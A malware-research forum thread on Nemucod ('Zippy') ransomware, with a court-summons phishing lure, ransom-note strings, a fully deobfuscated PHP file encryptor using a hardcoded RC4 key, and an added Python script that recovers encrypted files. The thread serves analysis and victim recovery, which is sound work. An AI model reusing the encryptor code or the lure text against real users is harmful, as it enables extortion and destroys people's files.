JS/Nemucod (Zippy ransomware)

Posted: Mon Apr 18, 2016 4:35 pm
by maddog4012
Came across this over the weekend. The JavaScript came as an attachment with the following e-mail message:

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


When executed it downloads a random file with a .png.exe extension.

Re: Zippy ransomware

Posted: Wed Apr 20, 2016 2:40 pm
by Antelox

Re: Zippy ransomware

Posted: Mon Apr 25, 2016 5:39 am
by parviz
maddog4012 wrote: Came across this over the weekend. The JavaScript came as an attachment with the following e-mail message:

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


When executed it downloads a random file with a .png.exe extension.
Can't find password.

Re: Zippy ransomware

Posted: Mon Apr 25, 2016 11:47 am
by TETYYSs
parviz wrote: Can't find password.
Protip: it's on the current page you're viewing.

Re: Zippy ransomware

Posted: Fri Apr 29, 2016 1:06 pm
by Antelox
New Nemucod variant. 7-Zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox

Re: Zippy ransomware

Posted: Fri Apr 29, 2016 3:28 pm
by Intimacygel
Antelox wrote: New Nemucod variant. 7-Zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox
Where do we download those variants from your link?

Re: Zippy ransomware

Posted: Sun May 01, 2016 8:40 pm
by Antelox
In the attachment is the archive which contains the original email's attachment.

I wrote simple Python scripts to extract the key and recover the files infected by this last Nemucod variant:

https://github.com/Antelox/NemucodFR

BR,

Antelox

Re: Zippy ransomware

Posted: Sun May 22, 2016 1:31 pm
by Antelox
NemucodFR v. 0.2 is out. Now it handles 2 Nemucod variants.

https://github.com/Antelox/NemucodFR

BR,

Antelox

Nemucod Ransomware

Posted: Mon Dec 12, 2016 9:45 pm
by xors
Hello all,

The dropper is a .wsf file. The dropper downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:
Code:
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.


Re: Nemucod Ransomware

Posted: Tue Dec 13, 2016 7:32 am
by Antelox
xors wrote: Hello all,

The dropper is a .wsf file. The dropper downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:
Code:
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses RC4 encryption. The deobfuscated script is below:
Code:
<?php set_time_limit(0);
ini_set("display_errors", "Off");
// Walk every drive letter from C: to Z: that exists.
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92); // backslash, used as the path separator
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs"); // hardcoded 30-byte RC4 key, the same for every file
    $a = "e"; // mode: "e" encrypts matching files; "d" runs the same RC4 pass over *.crypted files and strips the extension
    // Skip Windows/system/program directories and the recycle bin.
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o); // recurse into subdirectories
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048); // only the first 2048 bytes of each file are ever touched
                // RC4 key-scheduling algorithm (KSA)
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                // RC4 keystream generation (PRGA) XORed over the buffer; the keystream restarts from scratch for every file
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c); // overwrite the original header bytes in place
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted"); // mark the file as encrypted
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o)); // "d" mode: drop the marker again
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox
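As an added example (not part of the thread and not Antelox's NemucodFR code), the recovery logic that the deobfuscated script above makes possible, written in Python: the RC4 key is a fixed literal in the script, only the first 2048 bytes of each file are transformed, and RC4 is symmetric with the keystream restarting per file, so running the same transform over a *.crypted file restores it. The `extract_key` regex, the function names and the constructed sample data are my own assumptions; the base64 key string is the one in the quoted script.

```python
import base64
import os
import re

# Key literal copied from the deobfuscated PHP script quoted in the thread.
PAGE_KEY_B64 = "MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs"
PAGE_KEY = base64.b64decode(PAGE_KEY_B64)
# The script calls fread($fp, 2048), so only this prefix of each file is RC4'd.
ENCRYPTED_PREFIX_LEN = 2048


def extract_key(php_script: str) -> bytes:
    """Pull the hardcoded RC4 key out of a deobfuscated PHP script.

    Assumption: the key appears as $k = base64_decode("..."); as in the quoted
    variant. Other variants would need their own pattern.
    """
    m = re.search(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', php_script)
    if not m:
        raise ValueError("no base64_decode(...) key literal found in script")
    return base64.b64decode(m.group(1))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), mirroring the PHP loops byte for byte."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:                         # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def nemucod_transform(data: bytes, key: bytes) -> bytes:
    """Apply the script's per-file operation: RC4 over the first 2048 bytes only.

    Because RC4 is its own inverse and the script restarts the keystream for
    every file, this one function both reproduces the damage and undoes it.
    """
    head, tail = data[:ENCRYPTED_PREFIX_LEN], data[ENCRYPTED_PREFIX_LEN:]
    return rc4(key, head) + tail


def recover_file(crypted_path: str, key: bytes) -> str:
    """Decrypt one *.crypted file into a sibling file with the suffix removed.

    Unlike the malware this never writes in place: the encrypted copy is kept
    and an existing output file is never clobbered.
    """
    if not crypted_path.endswith(".crypted"):
        raise ValueError("expected a .crypted file: " + crypted_path)
    out_path = crypted_path[: -len(".crypted")]
    if os.path.exists(out_path):
        raise FileExistsError(out_path)
    with open(crypted_path, "rb") as f:
        data = f.read()
    with open(out_path, "wb") as f:
        f.write(nemucod_transform(data, key))
    return out_path


if __name__ == "__main__":
    import sys
    # Usage: python recover.py <file1.crypted> [file2.crypted ...]
    for path in sys.argv[1:]:
        print("recovered", recover_file(path, PAGE_KEY))
```

Because everything past byte 2048 is untouched, a file's tail survives even without the key; the transform only has to repair the header, which is why a static key in the dropper makes full recovery possible for this variant.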